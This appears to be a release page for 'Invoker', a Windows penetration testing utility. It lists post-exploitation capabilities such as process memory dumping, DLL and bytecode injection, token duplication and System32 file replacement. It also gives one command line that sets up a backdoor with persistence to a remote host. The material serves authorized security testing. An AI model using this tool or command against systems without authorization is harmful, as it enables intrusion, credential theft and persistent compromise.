invoker v5.7.3 releases: Penetration testing utility

invoker

Invoker

Penetration testing utility.

The goal is to use this tool when access to some Windows OS features through GUI is restricted.

Capabilities:

  • invoke the Command Prompt and PowerShell,
  • use Windows Management Instrumentation (WMI),
  • connect to a remote host,
  • run a new process,
  • terminate a running process,
  • dump a process memory,
  • inject a bytecode into a running process,
  • inject a DLL into a running process,
  • list DLLs of a running process,
  • install a hook procedure,
  • enable access token privileges,
  • duplicate the access token of a running process,
  • download a file,
  • add a registry key,
  • schedule a task,
  • list unquoted service paths and restart a running service,
  • replace System32 files.

Changelog v5.7.3

  • Visual Studio project update.

Download

git clone https://github.com/ivan-sincek/invoker.git

Use

To automate the backdoor while setting up persistence, you can run the following command:

Invoker_x64.exe 192.168.8.5 9000

32-bit Invoker can only:

  • dump the memory of a 32-bit process,
  • inject a 32-bit bytecode into a 32-bit process,
  • inject a 32-bit DLL into a 32-bit process,
  • list DLLs of a 32-bit process,
  • install a hook procedure from a 32-bit DLL.

64-bit Invoker can only:

  • dump the memory of a 32-bit process,
  • dump the memory of a 64-bit process,
  • inject a 32-bit bytecode into a 32-bit process,
  • inject a 64-bit bytecode into a 64-bit process,
  • inject a 32-bit DLL into a 32-bit process,
  • inject a 64-bit DLL into a 64-bit process,
  • list DLLs of a 32-bit process,
  • list DLLs of a 64-bit process.
  • install a hook procedure from a 32-bit DLL,
  • install a hook procedure from a 64-bit DLL.

Run ‘\exec\Invoker.exe’

Tutorial

Copyright (c) 2019 Ivan Šincek

Source: https://github.com/ivan-sincek/